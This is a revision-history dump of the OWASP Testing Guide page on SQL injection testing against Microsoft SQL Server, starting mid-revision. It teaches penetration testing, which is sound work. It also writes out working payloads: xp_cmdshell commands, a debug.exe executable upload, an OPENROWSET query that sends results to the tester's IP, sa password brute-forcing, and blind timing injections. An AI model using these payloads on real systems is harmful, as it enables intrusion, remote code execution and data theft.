If FTP is not allowed by the firewall, we have a workaround that exploits the Windows debugger, debug.exe, that is installed by default in all Windows machines. Debug.exe is scriptable and is able to create an executable by executing an appropriate script file. What we need to do is to convert the executable into a debug script (which is a 100% ascii file), upload it line by line and finally call debug.exe on it. There are several tools that create such debug files (e.g.: makescr.exe by Ollie Whitehouse and dbgtool.exe by toolcrypt.org). The queries to inject will therefore be the following:<br />
<pre><br />
exec master..xp_cmdshell 'echo [debug script line #1 of n] > debugscript.txt';--<br />
exec master..xp_cmdshell 'echo [debug script line #2 of n] >> debugscript.txt';--<br />
....<br />
exec master..xp_cmdshell 'echo [debug script line #n of n] >> debugscript.txt';--<br />
exec master..xp_cmdshell 'debug.exe < debugscript.txt';--<br />
</pre><br />
At this point, our executable is available on the target machine, ready to be executed.<br />
<br />
There are tools that automate this process, most notably Bobcat, which runs on Windows, and Sqlninja, which runs on *nix (See the tools at the bottom of this page).<br />
<br />
===Obtain information when it is not displayed (Out of band)===<br />
<br />
Not all is lost when the web application does not return any information --such as descriptive error messages (cf. [[http://www.owasp.org/index.php/Blind_SQL_Injection|Blind SQL injection]]). For example, it might happen that one has access to the source code (e.g., because the web application is based on an open source software). Then, the pen tester can exploit all the SQL-injection vulnerabilities discovered offline in the web application. Although an IPS might stop some of these attacks, the best way would be to proceed as follows: develop and test the attacks in a testbed created for that purpose, and then execute these attacks against the web application being tested. <br />
<br />
<br />
Other options for out of band attacks are describe in Sample 4 above. <br />
<br />
<br />
===Blind SQL injection attacks===<br />
<br />
====Trial and error====<br />
Alternatively, one may play lucky. That is the attacker may assume that there is a blind or out-of-band SQL-injection vulnerability in a the web application. He will then select an attack vector (e.g., a web entry), use fuzz vectors ([[http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors]]) against this channel and watch the response. For example, if the web application is looking for a book using a query<br />
<br />
select * from books where title='''text entered by the user'''<br />
<br />
then the penetration tester might enter the text: ''''Bomba' OR 1=1-''' and if data is not properly validated, the query will go through and return the whole list of books. This is evidence that there is a SQL-injection vulnerability. The penetration tester might later ''play'' with the queries in order to assess the criticality of this vulnerability.<br />
<br />
<br />
<br />
<br />
====In case more than one error message is displayed====<br />
On the other hand, if no prior information is available there is still a possibility of attacking by exploiting any ''covert channel''. It might happen that descriptive error messages are stopped, yet the error messages give some information. For example: <br />
<br />
* On some cases the web application (actually the web server) might return the traditional ''500: Internal Server Error'', say when the application returns an exception that might be generated for instance by a query with unclosed quotes. <br />
* While on other cases the server will return a 200OK message, but the web application will return some error message inserted by the developers ''Internal server error'' or ''bad data''. <br />
<br />
This 1 bit of information might be enough to understand how the dynamic SQL query is constructed by the web application and tune up an exploit.<br />
<br />
Another out-of-band method is to output the results through HTTP browseable <br />
<br />
<br />
====Timing attacks====<br />
There is one more possibility for making a blind SQL-injection attack, for example, using the time that it takes the web application to answer a request (see, e.g., ''Bleichenbacher's attack''). An attack of this sort is described by Anley in ([2]) from where we take the next example. A first approach uses the ''SQL command waitfor delay '0:0:5','' for example assume that data is not properly validated through a given attack vector but there is no feedback. Let's say that the attacker wants to check if the ''books'' database exists he will send the command<br />
<br />
if exists (select * from pubs..pub_info) waitfor delay '0:0:5'<br />
<br />
In fact, what we have here is two things: a '''SQL-injection vulnerability''' and a '''covert channel''' that allows the penetration tester to get 1 bit of information. Hence, using several queries (as much queries as the bits in the required information) the pen tester can get any data that is in the database. Say, the string<br />
<br />
declare @s varchar(8000) <br />
select @s = db_name() <br />
if (ascii(substring(@s, ''n'', ''b'')) & ( power(2, 0))) > 0 waitfor delay 0:0:5<br />
<br />
will wait for 5 seconds if the ''n''th bit of the name of the current database is ''b'', and will return at once if it is ''1-b''. After discovering the value of each byte, the pen tester will see if the first bit of the next byte is neither 1 nor 0, this means that the string has ended!<br />
<br />
However, it might happen that the command ''waitfor'' is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL-injection attacks cannot be done, the pen tester should only come up with any time consuming operation that is not filtered. For example<br />
<br />
declare @i int select @i = 0<br />
while @i < 0xaffff begin<br />
select @i = @i + 1<br />
end<br />
<br />
===Example 8: bruteforce of sysadmin password===<br />
<br />
One of the most useful commands in SQL Server (at least for the penetration tester) is the OPENROWSET command, which is used to run a query on another DB Server and retrieve the result. We can leverage the fact that OPENROWSET needs proper credentials to successfully perform the connection and that such a connection can be also "looped" to the local DB Server.<br />
Combining these features with an inferenced injection based on response timing, we can inject the following code:<br />
<pre><br />
select * from OPENROWSET('SQLOLEDB','';'sa';'<pwd>','select 1;waitfor delay ''0:0:5'' ')<br />
</pre><br />
What we do here is to attempt a connection to the local database (specified by the empty field after 'SQLOLEDB') using "sa" and "<pwd>" as credentials. If the password is correct and the connection is successful, the query is executed, making the DB wait for 5 seconds (and also returning a value, since OPENROWSET expects at least one column). Fetching the candidate passwords from a wordlist and measuring the time needed for each connection, we can attempt to guess the correct password. In "Data-mining with SQL Injection and Inference", David Litchfield pushes this technique even further, by injecting a piece of code in order to bruteforce the sysadmin password using the CPU resources of the DB Server itself. <br />
Once we have the sysadmin password, we have two choices:<br />
<br />
* Inject all following queries using OPENROWSET, in order to use sysadmin privileges<br />
<br />
* Add our current user to the sysadmin group using sp_addsrvrolemember. The current user name can be extracted using inferenced injection against the variable system_user<br />
<br />
Keep in mind that OPENROWSET is enabled by default in SQL Server 2000 but disabled in SQL Server 2005.<br />
<br />
===Checking for version and vulnerabilities===<br />
In case the pen tester can make some queries to the database engine, he will be able to get the database engine's version. He can next match this product name and version with known vulnerabilities or a zero-day exploit that he might have access to.<br />
<br />
<br />
== References ==<br />
'''Whitepapers'''<br><br />
* Daniel Bleichenbacher: "Chosen Ciphertext Attacks Against Protocols Based on the RSA Encryption Standard PKCS #1", CRYPTO 1998, pp1-12.<br />
* David Litchfield: "Data-mining with SQL Injection and Inference" - http://www.nextgenss.com/research/papers/sqlinference.pdf<br />
* Chris Anley, "(more) Advanced SQL Injection", whitepaper. NGSSoftware Insight Security Research Publication, 2002.<br />
* Steve Friedl's Unixwiz.net Tech Tips: "SQL Injection Attacks by Example" - http://www.unixwiz.net/techtips/sql-injection.html<br />
* Alexander Chigrik: "Useful undocumented extended stored procedures" - http://www.mssqlcity.com/Articles/Undoc/UndocExtSP.htm<br />
* Antonin Foller: "Custom xp_cmdshell, using shell object" - http://www.motobit.com/tips/detpg_cmdshell<br />
* Paul Litwin: "Stop SQL Injection Attacks Before They Stop You" - http://msdn.microsoft.com/msdnmag/issues/04/09/SQLInjection/<br />
* SQL Injection - http://msdn2.microsoft.com/en-us/library/ms161953.aspx<br />
<br />
<br />
<br />
<br />
<br />
<br />
'''Tools'''<br><br />
* Francois Larouche: Multiple DBMS Sql Injection tool - [[http://www.sqlpowerinjector.com/index.htm SQL Power Injector]]<br />
* Northern Monkee: [[http://www.northern-monkee.co.uk/projects/bobcat/bobcat.html Bobcat]]<br />
* icesurfer: SQL Server Takeover Tool - [[http://sqlninja.sourceforge.net sqlninja]]<br />
<br />
<br />
{{Category:OWASP Testing Project AoC}}</div>Watahttps://wiki.owasp.org/index.php?title=Testing_for_SQL_Server&diff=11537Testing for SQL Server2006-11-03T20:57:12Z<p>Wata: /* 1.2 Black Box testing and example */</p>
<hr />
<div>{{Template:OWASP Testing Guide v2}}<br />
<br />
== Short Description of the Issue (Topic and Explanation) == <br />
[[http://www.owasp.org/index.php/SQL_Injection_AoC SQL injection vulnerabilities]] occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers. It allows for the execution of SQL code under the privileges of the user used to connect to the database.<br />
<br />
The Microsoft SQL server has a few particularities so that some exploits need to be specially customized for this application. That's the subject of this section.<br />
<br />
<br />
<br />
== Black Box testing and example ==<br />
===How to Test===<br />
<br />
As explained in [[SQL injection]] a SQL-injection exploit requires two things: an entry point and an exploit to enter. Any user-controlled parameter that gets processed by the application might be hiding a vulnerability. This includes:<br />
<br />
* Application parameters in query strings (e.g., GET requests)<br />
* Application parameters included as part of the body of a POST request<br />
* Browser-related information (e.g., user-agent, referrer)<br />
* Host-related information (e.g., host name, IP)<br />
* Session-related information (e.g., user ID, cookies) <br />
<br />
For building the exploits, the penetration tester has to know the operators used in SQL Server. There follow some useful operators and commands/stored procedures:<br />
<br />
* comment operator: -- (useful for forcing the query to ignore the remaining portion of the original query, this won't be necessary in every case)<br />
* query separator: ; (semicolon)<br />
* Stored procedures:<br />
** [[http://msdn2.microsoft.com/en-us/library/ms175046.aspx xp_cmdshell]] executes any command shell in the server with the same permissions that it is currently running.<br />
** [[http://msdn2.microsoft.com/en-us/library/ms180099.aspx sp_makewebtask]] Spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text. It requires '''sysadmin'''.<br />
** [[http://msdn2.microsoft.com/en-US/library/ms189505.aspx xp_sendmail]] Sends an e-mail message, which may include a query result set attachment, to the specified recipients. This extended stored procedure uses SQL Mail to send the message.<br />
* Implementing exploits with MS SQL functions<br />
** Most of the examples use the '''exec''' function. Bellow we show how to execute a shell command that writes the output of the command ''dir c:\inetpub'' in a browseable file using [[http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_xp_aa-sz_4jxo.asp xp_cmdshell]].<br />
<br />
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--<br />
<br />
Here, <br />
<br />
exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--<br />
<br />
which produces an HTML document containing the result of the query --so that it can be browsed by the pen tester! And <br />
<br />
'; select * from OPENROWSET('SQLOLEDB','uid='''sa''';pwd='''foobar''';Network=DBMSSOCN;Address=" + <br />
'''YOUR_IP_ADDRESS''' + "," + '''PORT''' + ";timeout=1','')--"<br />
<br />
returns the result of the query to the IP of the penetration tester. The fields in bold must be completed, where ''sa'' is the sysadmin and ''foobar'' his password, ''YOUR_IP_ADDRESS'' is the pen tester's IP and ''PORT'' the port number where he wants to receive this information. See [[http://msdn2.microsoft.com/en-us/library/ms190312.aspx OPENROWSET]]<br />
<br />
<br />
** The following uses the function '''db_name''' to return the name of the database in an error.<br />
<br />
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name()) <br />
<br />
Notice, the use of [[http://msdn.microsoft.com/library/en-us/tsqlref/ts_ca-co_2f3o.asp convert]]:<br />
<br />
CONVERT ( data_type [ ( length ) ] , expression [ , style ] )<br />
<br />
Explicitly converts an expression of one data type to another. It's used as part of SQL injection attacks to force a conversion error and trigger error messages containing information of interest for the pen tester (i.e. table field values).<br />
<br />
* Environment variables: '''@@version '''<br />
Information gathering is useful for exploiting software vulnerabilities at the SQL Server, through the exploitation of a SQL-injection attack or direct access to the SQL listener. A query of this sort will return the version of the SQL Server.<br />
<br />
<nowiki>/form.asp?prop=33%20union%20select%201,2006-01-06,2007-01-06,1,'stat','name1','name2',2006-01-06,1,@@version%20--</nowiki><br />
<br />
or<br />
<br />
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20@@VERSION)<br />
<br />
==Black Box testing and example==<br />
There follow several examples that exploit SQL injection vulnerabilities through different entry points.<br />
<br />
===Example 1: Testing for SQL Injection in a GET request. ===<br />
<br />
The most simple (and sometimes rewarding) case would be that of a login page requesting an user name and password for user login. You can try entering the following string "' or '1'='1" (without double quotes): <br />
<br />
<nowiki>https://vulnerable.web.app/login.asp?Username='%20or%20'1'='1&Password='%20or%20'1'='1</nowiki><br />
<br />
If the application is using Dynamic SQL queries, and the string gets appended to the user credentials validation query, this may result in a successful login to the application. <br />
<br />
===Example 2: Testing for SQL Injection in a GET request (2).===<br />
<br />
In order to learn how many columns there exist <br />
<br />
<nowiki>https://vulnerable.web.app/list_report.aspx?number=001%20UNION%20ALL%201,1,'a',1,1,1%20FROM%20users;--</nowiki><br />
<br />
<br />
===Example 3: Testing in a POST request ===<br />
<br />
SQL Injection, HTTP POST Content: email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />
<br />
A complete post example:<br />
<br />
POST <nowiki>https://vulnerable.web.app/forgotpass.asp HTTP/1.1</nowiki><br />
Host: vulnerable.web.app<br />
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Paros/3.2.13<br />
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />
Keep-Alive: 300<br />
Proxy-Connection: keep-alive<br />
Referrer: <nowiki>http://vulnerable.web.app/forgotpass.asp</nowiki><br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 50<br><br />
email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />
<br />
The error message obtained when a ' (single quote) character is entered at the email field is:<br />
<br />
Microsoft OLE DB Provider for SQL Server error '80040e14'<br />
Unclosed quotation mark before the character string '' '.<br />
/forgotpass.asp, line 15 <br />
<br />
===Example 4: Yet another (useful) GET example===<br />
<br />
Obtaining the application's source code<br />
<br />
a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--<br />
<br />
<br />
===Example 5: Referrer / User-Agent===<br />
<br />
The REFERER header set to:<br />
<br />
Referrer: <nowiki>https://vulnerable.web.app/login.aspx', 'user_agent', 'some_ip'); [SQL CODE]--</nowiki><br />
<br />
Allows the execution of arbitrary SQL Code. The same happens with the User-Agent header set to:<br />
<br />
User-Agent: user_agent', 'some_ip'); [SQL CODE]--<br />
<br />
===Obtain information when it is not displayed (Out of band)===<br />
<br />
Not all is lost when the web application does not return any information --such as descriptive error messages (cf. [[http://www.owasp.org/index.php/Blind_SQL_Injection|Blind SQL injection]]). For example, it might happen that one has access to the source code (e.g., because the web application is based on an open source software). Then, the pen tester can exploit all the SQL-injection vulnerabilities discovered offline in the web application. Although an IPS might stop some of these attacks, the best way would be to proceed as follows: develop and test the attacks in a testbed created for that purpose, and then execute these attacks against the web application being tested. <br />
<br />
<br />
Other options for out of band attacks are describe in Sample 4 above. <br />
<br />
<br />
===Blind SQL injection attacks===<br />
<br />
====Trial and error====<br />
Alternatively, one may play lucky. That is the attacker may assume that there is a blind or out-of-band SQL-injection vulnerability in a the web application. He will then select an attack vector (e.g., a web entry), use fuzz vectors ([[http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors]]) against this channel and watch the response. For example, if the web application is looking for a book using a query<br />
<br />
select * from books where title='''text entered by the user'''<br />
<br />
then the penetration tester might enter the text: ''''Bomba' OR 1=1-''' and if data is not properly validated, the query will go through and return the whole list of books. This is evidence that there is a SQL-injection vulnerability. The penetration tester might later ''play'' with the queries in order to assess the criticality of this vulnerability.<br />
<br />
<br />
<br />
<br />
====In case more than one error message is displayed====<br />
On the other hand, if no prior information is available there is still a possibility of attacking by exploiting any ''covert channel''. It might happen that descriptive error messages are stopped, yet the error messages give some information. For example: <br />
<br />
* On some cases the web application (actually the web server) might return the traditional ''500: Internal Server Error'', say when the application returns an exception that might be generated for instance by a query with unclosed quotes. <br />
* While on other cases the server will return a 200OK message, but the web application will return some error message inserted by the developers ''Internal server error'' or ''bad data''. <br />
<br />
This 1 bit of information might be enough to understand how the dynamic SQL query is constructed by the web application and tune up an exploit.<br />
<br />
Another out-of-band method is to output the results through HTTP browseable <br />
<br />
<br />
====Timing attacks====<br />
There is one more possibility for making a blind SQL-injection attack, for example, using the time that it takes the web application to answer a request (see, e.g., ''Bleichenbacher's attack''). An attack of this sort is described by Anley in ([2]) from where we take the next example. A first approach uses the ''SQL command waitfor delay '0:0:5','' for example assume that data is not properly validated through a given attack vector but there is no feedback. Let's say that the attacker wants to check if the ''books'' database exists he will send the command<br />
<br />
if exists (select * from pubs..pub_info) waitfor delay '0:0:5'<br />
<br />
In fact, what we have here is two things: a '''SQL-injection vulnerability''' and a '''covert channel''' that allows the penetration tester to get 1 bit of information. Hence, using several queries (as much queries as the bits in the required information) the pen tester can get any data that is in the database. Say, the string<br />
<br />
declare @s varchar(8000) <br />
select @s = db_name() <br />
if (ascii(substring(@s, ''n'', ''b'')) & ( power(2, 0))) > 0 waitfor delay 0:0:5<br />
<br />
will wait for 5 seconds if the ''n''th bit of the name of the current database is ''b'', and will return at once if it is ''1-b''. After discovering the value of each byte, the pen tester will see if the first bit of the next byte is neither 1 nor 0, this means that the string has ended!<br />
<br />
However, it might happen that the command ''waitfor'' is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL-injection attacks cannot be done, the pen tester should only come up with any time consuming operation that is not filtered. For example<br />
<br />
declare @i int select @i = 0<br />
while @i < 0xaffff begin<br />
select @i = @i + 1<br />
end<br />
<br />
<br />
===Checking for version and vulnerabilities===<br />
In case the pen tester can make some queries to the database engine, he will be able to get the database engine's version. He can next match this product name and version with known vulnerabilities or a zero-day exploit that he might have access to.<br />
<br />
== Gray Box testing and example == <br />
'''Testing for Topic X vulnerabilities:'''<br><br />
...<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== References ==<br />
'''Whitepapers'''<br><br />
# Daniel Bleichenbacher, Chosen Ciphertext Attacks Against Protocols Based on the RSA Encryption Standard PKCS #1, CRYPTO 1998, pp1-12.<br />
# Chris Anley, "(more) Advanced SQL Injection", whitepaper. NGSSoftware Insight Security Research Publication, 2002.<br />
# Steve Friedl's Unixwiz.net Tech Tips. SQL Injection Attacks by Example. [[http://www.unixwiz.net/techtips/sql-injection.html]]<br />
<br />
'''Tools'''<br><br />
...<br><br />
{{Category:OWASP Testing Project AoC}}<br />
[[OWASP Testing Guide v2 Table of Contents]]<br />
<br />
{{Template:Stub}}</div>Watahttps://wiki.owasp.org/index.php?title=Testing_for_SQL_Server&diff=11536Testing for SQL Server2006-11-03T20:56:31Z<p>Wata: /* 1.1 How to Test */</p>
<hr />
<div>{{Template:OWASP Testing Guide v2}}<br />
<br />
== Short Description of the Issue (Topic and Explanation) == <br />
[[http://www.owasp.org/index.php/SQL_Injection_AoC SQL injection vulnerabilities]] occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers. It allows for the execution of SQL code under the privileges of the user used to connect to the database.<br />
<br />
The Microsoft SQL server has a few particularities so that some exploits need to be specially customized for this application. That's the subject of this section.<br />
<br />
<br />
<br />
== Black Box testing and example ==<br />
===How to Test===<br />
<br />
As explained in [[SQL injection]] a SQL-injection exploit requires two things: an entry point and an exploit to enter. Any user-controlled parameter that gets processed by the application might be hiding a vulnerability. This includes:<br />
<br />
* Application parameters in query strings (e.g., GET requests)<br />
* Application parameters included as part of the body of a POST request<br />
* Browser-related information (e.g., user-agent, referrer)<br />
* Host-related information (e.g., host name, IP)<br />
* Session-related information (e.g., user ID, cookies) <br />
<br />
For building the exploits, the penetration tester has to know the operators used in SQL Server. There follow some useful operators and commands/stored procedures:<br />
<br />
* comment operator: -- (useful for forcing the query to ignore the remaining portion of the original query, this won't be necessary in every case)<br />
* query separator: ; (semicolon)<br />
* Stored procedures:<br />
** [[http://msdn2.microsoft.com/en-us/library/ms175046.aspx xp_cmdshell]] executes any command shell in the server with the same permissions that it is currently running.<br />
** [[http://msdn2.microsoft.com/en-us/library/ms180099.aspx sp_makewebtask]] Spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text. It requires '''sysadmin'''.<br />
** [[http://msdn2.microsoft.com/en-US/library/ms189505.aspx xp_sendmail]] Sends an e-mail message, which may include a query result set attachment, to the specified recipients. This extended stored procedure uses SQL Mail to send the message.<br />
* Implementing exploits with MS SQL functions<br />
** Most of the examples use the '''exec''' function. Bellow we show how to execute a shell command that writes the output of the command ''dir c:\inetpub'' in a browseable file using [[http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_xp_aa-sz_4jxo.asp xp_cmdshell]].<br />
<br />
exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'--<br />
<br />
Here, <br />
<br />
exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--<br />
<br />
which produces an HTML document containing the result of the query --so that it can be browsed by the pen tester! And <br />
<br />
'; select * from OPENROWSET('SQLOLEDB','uid='''sa''';pwd='''foobar''';Network=DBMSSOCN;Address=" + <br />
'''YOUR_IP_ADDRESS''' + "," + '''PORT''' + ";timeout=1','')--"<br />
<br />
returns the result of the query to the IP of the penetration tester. The fields in bold must be completed, where ''sa'' is the sysadmin and ''foobar'' his password, ''YOUR_IP_ADDRESS'' is the pen tester's IP and ''PORT'' the port number where he wants to receive this information. See [[http://msdn2.microsoft.com/en-us/library/ms190312.aspx OPENROWSET]]<br />
<br />
<br />
** The following uses the function '''db_name''' to return the name of the database in an error.<br />
<br />
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_name()) <br />
<br />
Notice, the use of [[http://msdn.microsoft.com/library/en-us/tsqlref/ts_ca-co_2f3o.asp convert]]:<br />
<br />
CONVERT ( data_type [ ( length ) ] , expression [ , style ] )<br />
<br />
Explicitly converts an expression of one data type to another. It's used as part of SQL injection attacks to force a conversion error and trigger error messages containing information of interest for the pen tester (i.e. table field values).<br />
<br />
* Environment variables: '''@@version '''<br />
Information gathering is useful for exploiting software vulnerabilities at the SQL Server, through the exploitation of a SQL-injection attack or direct access to the SQL listener. A query of this sort will return the version of the SQL Server.<br />
<br />
<nowiki>/form.asp?prop=33%20union%20select%201,2006-01-06,2007-01-06,1,'stat','name1','name2',2006-01-06,1,@@version%20--</nowiki><br />
<br />
or<br />
<br />
/controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20@@VERSION)<br />
<br />
==1.2 Black Box testing and example==<br />
There follow several examples that exploit SQL injection vulnerabilities through different entry points.<br />
<br />
===Example 1: Testing for SQL Injection in a GET request. ===<br />
<br />
The most simple (and sometimes rewarding) case would be that of a login page requesting an user name and password for user login. You can try entering the following string "' or '1'='1" (without double quotes): <br />
<br />
<nowiki>https://vulnerable.web.app/login.asp?Username='%20or%20'1'='1&Password='%20or%20'1'='1</nowiki><br />
<br />
If the application is using Dynamic SQL queries, and the string gets appended to the user credentials validation query, this may result in a successful login to the application. <br />
<br />
===Example 2: Testing for SQL Injection in a GET request (2).===<br />
<br />
In order to learn how many columns there exist <br />
<br />
<nowiki>https://vulnerable.web.app/list_report.aspx?number=001%20UNION%20ALL%201,1,'a',1,1,1%20FROM%20users;--</nowiki><br />
<br />
<br />
===Example 3: Testing in a POST request ===<br />
<br />
SQL Injection, HTTP POST Content: email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />
<br />
A complete post example:<br />
<br />
POST <nowiki>https://vulnerable.web.app/forgotpass.asp HTTP/1.1</nowiki><br />
Host: vulnerable.web.app<br />
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 Paros/3.2.13<br />
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />
Keep-Alive: 300<br />
Proxy-Connection: keep-alive<br />
Referrer: <nowiki>http://vulnerable.web.app/forgotpass.asp</nowiki><br />
Content-Type: application/x-www-form-urlencoded<br />
Content-Length: 50<br><br />
email=%27&whichSubmit=submit&submit.x=0&submit.y=0<br />
<br />
The error message obtained when a ' (single quote) character is entered at the email field is:<br />
<br />
Microsoft OLE DB Provider for SQL Server error '80040e14'<br />
Unclosed quotation mark before the character string '' '.<br />
/forgotpass.asp, line 15 <br />
<br />
===Example 4: Yet another (useful) GET example===<br />
<br />
Obtaining the application's source code<br />
<br />
a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--<br />
<br />
<br />
===Example 5: Referrer / User-Agent===<br />
<br />
The REFERER header set to:<br />
<br />
Referrer: <nowiki>https://vulnerable.web.app/login.aspx', 'user_agent', 'some_ip'); [SQL CODE]--</nowiki><br />
<br />
Allows the execution of arbitrary SQL Code. The same happens with the User-Agent header set to:<br />
<br />
User-Agent: user_agent', 'some_ip'); [SQL CODE]--<br />
<br />
===Obtain information when it is not displayed (Out of band)===<br />
<br />
Not all is lost when the web application does not return any information --such as descriptive error messages (cf. [[http://www.owasp.org/index.php/Blind_SQL_Injection|Blind SQL injection]]). For example, it might happen that one has access to the source code (e.g., because the web application is based on an open source software). Then, the pen tester can exploit all the SQL-injection vulnerabilities discovered offline in the web application. Although an IPS might stop some of these attacks, the best way would be to proceed as follows: develop and test the attacks in a testbed created for that purpose, and then execute these attacks against the web application being tested. <br />
<br />
<br />
Other options for out of band attacks are describe in Sample 4 above. <br />
<br />
<br />
===Blind SQL injection attacks===<br />
<br />
====Trial and error====<br />
Alternatively, one may play lucky. That is the attacker may assume that there is a blind or out-of-band SQL-injection vulnerability in a the web application. He will then select an attack vector (e.g., a web entry), use fuzz vectors ([[http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors]]) against this channel and watch the response. For example, if the web application is looking for a book using a query<br />
<br />
select * from books where title='''text entered by the user'''<br />
<br />
then the penetration tester might enter the text: ''''Bomba' OR 1=1-''' and if data is not properly validated, the query will go through and return the whole list of books. This is evidence that there is a SQL-injection vulnerability. The penetration tester might later ''play'' with the queries in order to assess the criticality of this vulnerability.<br />
<br />
<br />
<br />
<br />
====In case more than one error message is displayed====<br />
On the other hand, if no prior information is available there is still a possibility of attacking by exploiting any ''covert channel''. It might happen that descriptive error messages are stopped, yet the error messages give some information. For example: <br />
<br />
* On some cases the web application (actually the web server) might return the traditional ''500: Internal Server Error'', say when the application returns an exception that might be generated for instance by a query with unclosed quotes. <br />
* While on other cases the server will return a 200OK message, but the web application will return some error message inserted by the developers ''Internal server error'' or ''bad data''. <br />
<br />
This 1 bit of information might be enough to understand how the dynamic SQL query is constructed by the web application and tune up an exploit.<br />
<br />
Another out-of-band method is to output the results through HTTP browseable <br />
<br />
<br />
====Timing attacks====<br />
There is one more possibility for making a blind SQL-injection attack, for example, using the time that it takes the web application to answer a request (see, e.g., ''Bleichenbacher's attack''). An attack of this sort is described by Anley in ([2]) from where we take the next example. A first approach uses the ''SQL command waitfor delay '0:0:5','' for example assume that data is not properly validated through a given attack vector but there is no feedback. Let's say that the attacker wants to check if the ''books'' database exists he will send the command<br />
<br />
if exists (select * from pubs..pub_info) waitfor delay '0:0:5'<br />
<br />
In fact, what we have here is two things: a '''SQL-injection vulnerability''' and a '''covert channel''' that allows the penetration tester to get 1 bit of information. Hence, using several queries (as much queries as the bits in the required information) the pen tester can get any data that is in the database. Say, the string<br />
<br />
declare @s varchar(8000) <br />
select @s = db_name() <br />
if (ascii(substring(@s, ''n'', ''b'')) & ( power(2, 0))) > 0 waitfor delay 0:0:5<br />
<br />
will wait for 5 seconds if the ''n''th bit of the name of the current database is ''b'', and will return at once if it is ''1-b''. After discovering the value of each byte, the pen tester will see if the first bit of the next byte is neither 1 nor 0, this means that the string has ended!<br />
<br />
However, it might happen that the command ''waitfor'' is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL-injection attacks cannot be done, the pen tester should only come up with any time consuming operation that is not filtered. For example<br />
<br />
declare @i int select @i = 0<br />
while @i < 0xaffff begin<br />
select @i = @i + 1<br />
end<br />
<br />
<br />
===Checking for version and vulnerabilities===<br />
In case the pen tester can make some queries to the database engine, he will be able to get the database engine's version. He can next match this product name and version with known vulnerabilities or a zero-day exploit that he might have access to.<br />
<br />
== Gray Box testing and example == <br />
'''Testing for Topic X vulnerabilities:'''<br><br />
...<br><br />
'''Result Expected:'''<br><br />
...<br><br><br />
== References ==<br />
'''Whitepapers'''<br><br />
# Daniel Bleichenbacher, Chosen Ciphertext Attacks Against Protocols Based on the RSA Encryption Standard PKCS #1, CRYPTO 1998, pp1-12.<br />
# Chris Anley, "(more) Advanced SQL Injection", whitepaper. NGSSoftware Insight Security Research Publication, 2002.<br />
# Steve Friedl's Unixwiz.net Tech Tips. SQL Injection Attacks by Example. [[http://www.unixwiz.net/techtips/sql-injection.html]]<br />
<br />
'''Tools'''<br><br />
...<br><br />
{{Category:OWASP Testing Project AoC}}<br />
[[OWASP Testing Guide v2 Table of Contents]]<br />
<br />
{{Template:Stub}}</div>Watahttps://wiki.owasp.org/index.php?title=Testing_for_SQL_Server&diff=11535Testing for SQL Server2006-11-03T20:56:02Z<p>Wata: /* Black Box testing and example */</p>
<hr />
<div>{{Template:OWASP Testing Guide v2}}<br />
<br />
== Short Description of the Issue (Topic and Explanation) == <br />
[[http://www.owasp.org/index.php/SQL_Injection_AoC SQL injection vulnerabilities]] occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers. It allows for the execution of SQL code under the privileges of the user used to connect to the database.<br />
<br />
The Microsoft SQL server has a few particularities so that some exploits need to be specially customized for this application. That's the subject of this section.<br />
<br />
<br />
<br />
==1.1 How to Test==<br />
<br />
As explained in [[SQL injection]] a SQL-injection exploit requires two things: an entry point and an exploit to enter. Any user-controlled parameter that gets processed by the application might be hiding a vulnerability. This includes:<br />
<br />
* Application parameters in query strings (e.g., GET requests)<br />
